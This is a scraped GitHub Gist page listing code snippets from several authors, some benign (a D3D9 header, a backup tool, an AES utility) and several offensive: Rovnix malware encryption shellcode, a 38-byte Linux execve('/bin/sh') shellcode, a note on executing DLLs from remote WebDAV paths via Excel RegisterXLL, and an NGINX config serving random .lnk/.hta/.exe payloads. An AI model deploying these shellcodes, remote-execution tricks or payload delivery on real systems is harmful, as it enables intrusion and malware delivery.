Skip to content

Instantly share code, notes, and snippets.

View 0x25bit's full-sized avatar
:shipit:
Wait, did I stream that out loud?

Aekr1_ //akrasia 0x25bit

:shipit:
Wait, did I stream that out loud?
396 followers · 822 following
View GitHub Profile
@zachelko
zachelko / skater.cpp
Created April 8, 2010 06:23
Basic C/C++ code obfuscator.
// Zach J. Elko
// 2010
// skater.cpp
//
// I've wanted to make one of these for a while now. I got bored and
// whipped this up in about 3 hours. There are a lot of improvements
// that can/should be made, but it's not bad for the short amount of
// time put into it.
//
// Basic C/C++ code obfuscator.
@ruzickap
ruzickap / win7-admin.bat
Last active October 18, 2023 02:47
win7 customization file. Run right after you first log in as administrator.
:: Tested on Windows 7
@echo.
@echo Test connection settings
powershell -command "$client = new-object System.Net.WebClient; $client.DownloadFile('http://www.google.com', 'c:\del')"
if %ERRORLEVEL% NEQ 0 (
@echo Can not download files form Internet !!!
pause
exit
@enkomio
enkomio / rovnix_conn.py
Created August 25, 2015 16:53
Rovnix key generation and data encryption
from unicorn import *
from unicorn.x86_const import *
from capstone import *
import base64
import time
from collections import deque
encrypt_data_code = b"\x55\x8B\xEC\x83\xEC\x18\x8B\x50\x20\x53\x8B\x58\x28\x56\x8B\x70\x24\x57\x8B\xF9\x33\x5F\x08\x33\x17\x33\x77\x04\x33\x98\x38\x02\x00\x00\x33\x90\x30\x02\x00\x00\x33\xB0\x34\x02\x00\x00\x8B\x48\x2C\x33\x4F\x0C\x33\x88\x3C\x02\x00\x00\x8B\xF9\x0B\xCA\x33\xFE\x89\x4D\xFC\x8B\xCB\x33\xCE\x89\x7D\xF8\x89\x4D\xEC\x33\x4D\xFC\x8B\xFE\x33\xFA\x89\x4D\xF4\x8B\xCF\x23\x7D\xF8\x23\xCB\x8B\x5D\xF8\xF7\xD3\x0B\xCB\x8B\x5D\xEC\x0B\xDA\x33\xCB\x33\xF9\x33\x7D\xF4\x33\xFA\x8B\xDF\x0B\xD9\x23\x5D\xFC\x33\xDE\xC1\xC1\x0D\xC1\xC3\x03\x8B\xF3\x33\xF7\x33\xF1\x89\x4D\xF8\xD1\xC6\x8B\xD1\xC1\xE2\x03\x33\xD3\x33\x55\xF4\x8B\xCE\xC1\xE1\x07\x33\xCB\xC1\xC2\x07\x8B\xDE\x33\x5D\xF8\x33\x70\x34\x33\xCA\x33\xDA\x33\x50\x3C\xC1\xC1\x16\x33\x48\x38\xC1\xC3\x05\x33\x58\x30\x8B\xFB\x33\xFA\x89\x7D\xF0\x8B\xFE\x33\xFA\x89\x7D\xF4\x8B\xF9\xF7\xD7\x89\x7D\xFC\x8B\xFE\x89\x5D\xF8\x23\xFB\x33
@zeux
zeux / minid3d9.h
Created February 12, 2016 08:32
Minimal set of headers for D3D9
// This file is designed to be included in D3D9-dependent code instead of d3d9.h, while adding minimal amount of junk
#pragma once
#include <BaseTyps.h>
#include <BaseTsd.h>
// stdlib.h
#ifndef _INC_STDLIB
#define _INC_STDLIB
#endif
@DreamVB
DreamVB / main.cpp
Created September 16, 2016 22:35
Backup Files and Folders
/*
bBackup folder copy
Version 4
By Ben a.k.a DreamVB
*/
#include <iostream>
#include <Windows.h>
#include <string>
#include <algorithm>
@hasherezade
hasherezade / syscall_extractor.cpp
Last active August 30, 2023 21:47
Extracts syscalls list from NTDLL.DLL
#include <stdio.h>
#include <Windows.h>
// based on: https://www.evilsocket.net/2014/02/11/on-windows-syscall-mechanism-and-syscall-numbers-extraction-methods/
// author: @evilsocket
// modified by: @hasherezade
#define IS_ADDRESS_BETWEEN( left, right, address ) ( (address) >= (left) && (address) < (right) )
PIMAGE_SECTION_HEADER SectionByRVA( PIMAGE_SECTION_HEADER pSections, DWORD dwSections, DWORD rva )
{
@hasherezade
hasherezade / aes_crypt.cpp
Last active August 6, 2024 15:31
AES 128 - encrypt/decrypt using Windows Crypto API
#include <Windows.h>
#include <wincrypt.h>
#include <stdio.h>
#pragma comment(lib, "advapi32.lib")
#define AES_KEY_SIZE 16
#define IN_CHUNK_SIZE (AES_KEY_SIZE * 10) // a buffer must be a multiple of the key size
#define OUT_CHUNK_SIZE (IN_CHUNK_SIZE * 2) // an output buffer (for encryption) must be twice as big
//params: <input file> <output file> <is decrypt mode> <key>
@resilar
resilar / execve.c
Created March 8, 2017 17:07
Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes)
/*
* Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes)
* 31c050488b1424eb105478065e5fb03b0f05595b40b00bcd80e8ebffffff2f62696e2f736800
*
* - offset - bytes 32-bit code 64-bit code
* 0x00000000 31c0 xor eax, eax xor eax, eax
* 0x00000002 50 push eax push rax
* 0x00000003 48 dec eax rex.w
* 0x00000004 8b1424 mov edx, dword [esp] mov rdx, qword [rsp]
* 0x00000007 eb10 jmp 0x19 jmp 0x19
@ryhanson
ryhanson / ExcelXLL.md
Last active November 8, 2024 14:51
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@jivoi
jivoi / gist:a33ace2e25515a31aa2ffbae246d98c9
Created June 14, 2017 13:27
Serving Random Payloads with NGINX
# Serving Random Payloads with NGINX
# add set_random module https://github.com/openresty/set-misc-nginx-module#set_random
# edit file /etc/nginx/sites-enabled/default
set_random $uri 1 3;
map $uri $payloads {
1 /payload.lnk;
2 /payload.hta;
3 /payload.exe;